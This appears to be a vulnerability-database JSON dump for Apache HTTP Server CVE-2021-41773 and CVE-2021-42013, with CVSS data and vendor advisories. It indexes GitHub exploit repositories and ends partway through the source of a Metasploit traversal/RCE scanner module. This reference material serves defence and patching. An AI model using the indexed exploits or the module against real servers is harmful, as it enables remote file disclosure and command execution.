"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T17:30:43", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-11-09T18:13:57", "id": "789B6112-E84C-566E-89A7-82CC108EFCD9", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-29T22:34:44", "description": "# CVE-2021-41773\nPath traversal and file disclosure vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T23:53:48", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-07-29T10:40:45", "id": "27108E72-8DC1-53B5-97D9-E869CA13EFF7", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-01T21:44:38", "description": "# CVE-2021-41773\n\n[\n## \n\n[![N|So...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T05:34:48", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-11-15T12:00:37", "id": "ECD5D758-774C-5488-B782-C8996208B401", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 - Apache HTTP Server 2.4.49\n\n# Cara Menjalankan...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-20T14:41:15", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-23T13:15:51", "id": "C0380E16-C468-5540-A427-7FE34E7CF36B", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-10-29T18:03:53", "description": "# CVE-2021-41773\n## \ud83d\udc1b Path traversal and file disclosure vulnera...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-15T21:38:48", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-10-27T01:04:25", "id": "987C6FDB-3E70-5FF5-AB5B-D50065D27594", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-06-28T04:29:09", "description": "# Vulnerable docker images for CVE-2021-41773 Apache path traver...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T14:47:23", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-06-28T04:02:32", "id": "B4483895-BA86-5CFB-84F3-7C06411B5175", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2021-11-08T20:17:44", "description": "# cve-2021-41773-nse\n#By George Labrin (@creadpag)\n## \n\n[![N|Sol...", "cvss3": {}, "published": "2021-10-06T05:22:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-06T05:24:35", "id": "B8198D62-F9C8-5E03-A301-9A3580070B4C", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# Usage\nfile `ip-p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T08:10:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-10T18:59:44", "id": "A1FF76C0-CF98-5704-AEE4-DF6F1E434FA3", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-06-25T10:34:43", "description": "# ScaRCE Framework - CVE-2021-41773 Hunter\n[ | Ubuntu wasn't vulnerable to CVE-2021-41773 so we did not deploy the insufficient fix.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "ubuntucve", "title": "CVE-2021-42013", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "UB:CVE-2021-42013", "href": "https://ubuntu.com/security/CVE-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:15:19", "description": "A flaw was found in a change made to path normalization in Apache HTTP\nServer 2.4.49. An attacker could use a path traversal attack to map URLs to\nfiles outside the directories configured by Alias-like directives. If files\noutside of these directories are not protected by the usual default\nconfiguration \"require all denied\", these requests can succeed. If CGI\nscripts are also enabled for these aliased pathes, this could allow for\nremote code execution. This issue is known to be exploited in the wild.\nThis issue only affects Apache 2.4.49 and not earlier versions. The fix in\nApache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T00:00:00", "type": "ubuntucve", "title": "CVE-2021-41773", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-05T00:00:00", "id": "UB:CVE-2021-41773", "href": "https://ubuntu.com/security/CVE-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T13:15:20", "description": "While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected\nduring HTTP/2 request processing, allowing an external source to DoS the\nserver. This requires a specially crafted request. The vulnerability was\nrecently introduced in version 2.4.49. No exploit is known to the project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T00:00:00", "type": "ubuntucve", "title": "CVE-2021-41524", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524"], "modified": "2021-10-05T00:00:00", "id": "UB:CVE-2021-41524", "href": "https://ubuntu.com/security/CVE-2021-41524", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ibm": [{"lastseen": "2022-10-01T01:44:38", "description": "## Summary\n\nIBM Rational Build Forge version 8.0.x is affected by CVE-2021-42013\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-42013](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013>) \n** DESCRIPTION: **Apache HTTP Server could allow a remote attacker to execute arbitrary code on the system caused by a path traversal vulnerability related to an incomplete fix for CVE-2021-41773 when mod_cgi is enabled. By uploading a file and setting permissions, an attacker could exploit this vulnerability to execute arbitrary code on the system with Apache user privileges. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/210764](<https://exchange.xforce.ibmcloud.com/vulnerabilities/210764>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nBuild Forge| 8.0 - 8.0.0.20 \n \n\n\n## Remediation/Fixes\n\nYou must download the fix pack specified in the following table and apply it. \n\n**Affected Supporting Product(s)**\n\n| \n\n**Remediation/Fix** \n \n---|--- \n \nIBM Rational Build Forge 8.0 to 8.0.0.20\n\n| \n\n[Download](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FRational%2FRational+Build+Forge&fixids=RationalBuildForge-8.0.0.21&source=SAR> \"Download\" ) IBM Rational Build Forge 8.0.0.21.\n\nThe fix includes Apache-HTTP-Server-2.4.52 \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n17 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU037\",\"label\":\"HCL Technologies\"},\"Product\":{\"code\":\"SS2MGB\",\"label\":\"Rational Build Forge family\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF035\",\"label\":\"z\\/OS\"}],\"Version\":\"8.0.0.21\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-17T18:38:24", "type": "ibm", "title": "Security Bulletin: IBM Rational Build Forge 8.0.x is affected by Apache HTTP Server version used in it. (CVE-2021-42013)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-17T18:38:24", "id": "B0C070EA4747AEFBB7DD852AD2FEB1C85461D6FC3CC95192FD2B7703C8D3DCB2", "href": "https://www.ibm.com/support/pages/node/6541330", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-01-23T06:03:36", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T09:15:00", "type": "debiancve", "title": "CVE-2021-41773", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-05T09:15:00", "id": "DEBIANCVE:CVE-2021-41773", "href": "https://security-tracker.debian.org/tracker/CVE-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-23T06:03:36", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T16:15:00", "type": "debiancve", "title": "CVE-2021-42013", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T16:15:00", "id": "DEBIANCVE:CVE-2021-42013", "href": "https://security-tracker.debian.org/tracker/CVE-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-23T06:03:36", "description": "While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T09:15:00", "type": "debiancve", "title": "CVE-2021-41524", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524"], "modified": "2021-10-05T09:15:00", "id": "DEBIANCVE:CVE-2021-41524", "href": "https://security-tracker.debian.org/tracker/CVE-2021-41524", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "metasploit": [{"lastseen": "2022-11-01T10:46:09", "description": "This module scans for an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, it can be used to execute arbitrary commands (Remote Command Execution). This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T17:00:59", "type": "metasploit", "title": "Apache 2.4.49/2.4.50 Traversal RCE scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-22T16:38:03", "id": "MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-", "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/apache_normalize_path/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE scanner',\n 'Description' => %q{\n This module scans for an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773).\n If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled,\n it can be used to execute arbitrary commands (Remote Command Execution).\n This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n },\n 'References' => [\n ['CVE', '2021-41773'],\n ['CVE', '2021-42013'],\n ['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],\n ['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],\n ['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']\n ],\n 'Author' => [\n 'Ash Daulton', # Vulnerability discovery\n 'Dhiraj Mishra', # Metasploit auxiliary module\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise)\n ],\n 'DisclosureDate' => '2021-05-10',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n },\n 'Actions' => [\n [\n 'CHECK_TRAVERSAL',\n {\n 'Description' => 'Check for vulnerability.'\n }\n ],\n [\n 'CHECK_RCE',\n {\n 'Description' => 'Check for RCE (if mod_cgi is enabled).'\n }\n ],\n [\n 'READ_FILE',\n {\n 'Description' => 'Read file on the 